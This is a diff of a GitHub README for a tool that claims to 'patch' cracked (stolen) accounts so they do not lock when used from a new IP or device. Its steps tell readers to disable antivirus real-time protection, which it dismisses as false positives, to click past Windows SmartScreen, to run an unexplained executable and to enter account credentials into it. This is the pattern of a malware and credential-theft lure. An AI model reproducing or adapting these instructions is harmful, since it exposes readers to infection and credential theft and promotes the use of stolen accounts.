bochi82/BOCHIDROP-ACCOUNT-PATCHER/README.md

-# NordVpn-Patcher
+# BOCHIDROP ACCOUNT PATCHER

-Program for patching cracked accounts from locking themselves when used from a new IP/HWID.
+Programs for patching cracked accounts from locking themselves when used from a new IP/HWID.

 # Steps

-* Turn off your Antivirus (if it asks you for how long you'd like it disabled, you can select a few minutes).
+* Turn off your Antivirus (All cracking/hacking tools trigger AV's, but there are simply false positives..
 You can disable your AV by going into the software and finding    settings.
-In the settings, turn off a setting called "Real-Time Protection".
+In the settings, turn off a feature called "Real-Time Protection".
-* Download the .exe (or master file) from this page.
+* Download the master file from this page.
-* Run NordPatcher by clicking on the file.
-If windows prompts you saying it protected your pc and asking if it should run the file, click "More info" followed by "Run anyway".
+* Unzipthe file, and run PatcherManager by clicking on the exe.
+When it opens, enter the username and password information (separated with a colon, ex. johnsmith@gmail.com:abc123) into the textbox and click "Choose correct patcher and apply patch".
+It will open file explorer, and from there navigate to your downloads (or wherever you extracted the zip to) and select the correct patcher for what type of  account you've won.
-* After running, you can delete the .exe and reenable your AV.
+* After choosing the file and clicking "OK", you're set.
+If you'd like, you can now delete the patchers and patcher manager .exe's and reenable your AV.
-* Login to https://my.nordaccount.com/login/ using the details given to you, and download NordVPN.
+* Login to your account and enjoy!
-* Follow install process and login with your account when prompted.
-* Enjoy!